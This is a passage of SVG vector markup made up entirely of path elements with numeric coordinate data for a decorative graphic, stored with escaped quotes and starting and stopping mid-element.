d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7